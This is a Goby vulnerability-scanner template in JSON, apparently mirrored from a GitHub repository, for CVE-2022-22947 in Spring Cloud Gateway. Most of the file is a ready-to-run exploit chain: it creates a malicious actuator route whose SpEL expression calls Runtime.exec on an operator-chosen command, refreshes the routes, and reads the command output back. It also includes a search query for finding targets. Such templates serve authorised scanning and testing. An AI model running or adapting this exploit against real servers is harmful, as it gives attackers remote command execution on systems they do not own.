qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Goby/json/CVE_2022_22947.json

255 lines
11 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "CVE-2022-22947",
"Level": "3",
"Tags": [
"rce"
],
"GobyQuery": "header=\"Vary: Accept-Encoding\" || Header=\"X-Cache: HIT\"",
"Description": "描述: Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本包含以前存在一处SpEL表达式注入漏洞当攻击者可以访问Actuator API的情况下将可以利用该漏洞执行任意命令。",
"Product": "spring",
"Homepage": "https://gobies.org/",
"Author": "gobysec@gmail.com",
"Impact": "<p>描述: Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本包含以前存在一处SpEL表达式注入漏洞当攻击者可以访问Actuator API的情况下将可以利用该漏洞执行任意命令。<br></p>",
"Recommendation": "<p>升级版本</p>",
"References": [
"https://gobies.org/"
],
"HasExp": true,
"ExpParams": [
{
"Name": "cmd",
"Type": "input",
"Value": "whoami"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/actuator/gateway/routes/hacktest",
"follow_redirect": true,
"header": {
"Accept-Encoding": "gzip, deflate",
"Accept": "*/*",
"Accept-Language": "en",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
"Content-Type": "application/json"
},
"data_type": "text",
"data": "{\r\n \"id\": \"hacktest\",\r\n \"filters\": [{\r\n \"name\": \"AddResponseHeader\",\r\n \"args\": {\"name\": \"Result\",\"value\": \"#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\\"whoami\\\"}).getInputStream()))}\"}\r\n }],\r\n \"uri\": \"http://example.com\",\r\n \"order\": 0\r\n }",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "201",
"bz": ""
},
{
"type": "item",
"variable": "$head",
"operation": "contains",
"value": "hacktest",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody||"
]
},
{
"Request": {
"method": "POST",
"uri": "/actuator/gateway/refresh",
"follow_redirect": true,
"header": {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$head",
"operation": "contains",
"value": "",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
},
{
"Request": {
"method": "GET",
"uri": "/actuator/gateway/routes/hacktest",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|text|"
]
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/actuator/gateway/routes/hacktest",
"follow_redirect": true,
"header": {
"Accept-Encoding": "gzip, deflate",
"Accept": "*/*",
"Content-Type": "application/json"
},
"data_type": "text",
"data": "{\r\n \"id\": \"hacktest\",\r\n \"filters\": [{\r\n \"name\": \"AddResponseHeader\",\r\n \"args\": {\"name\": \"Result\",\"value\": \"#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\\"{{{cmd}}}\\\"}).getInputStream()))}\"}\r\n }],\r\n \"uri\": \"http://example.com\",\r\n \"order\": 0\r\n }",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "201",
"bz": ""
},
{
"type": "item",
"variable": "$head",
"operation": "contains",
"value": "0",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody||"
]
},
{
"Request": {
"method": "POST",
"uri": "/actuator/gateway/refresh",
"follow_redirect": true,
"header": {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody||"
]
},
{
"Request": {
"method": "GET",
"uri": "/actuator/gateway/routes/hacktest",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "predicate",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|Result = '(.*?)\\\\n'"
]
}
],
"PostTime": "2022-03-04 13:36:51",
"GobyVersion": "1.9.325"
}
Reference in New Issue View Git Blame Copy Permalink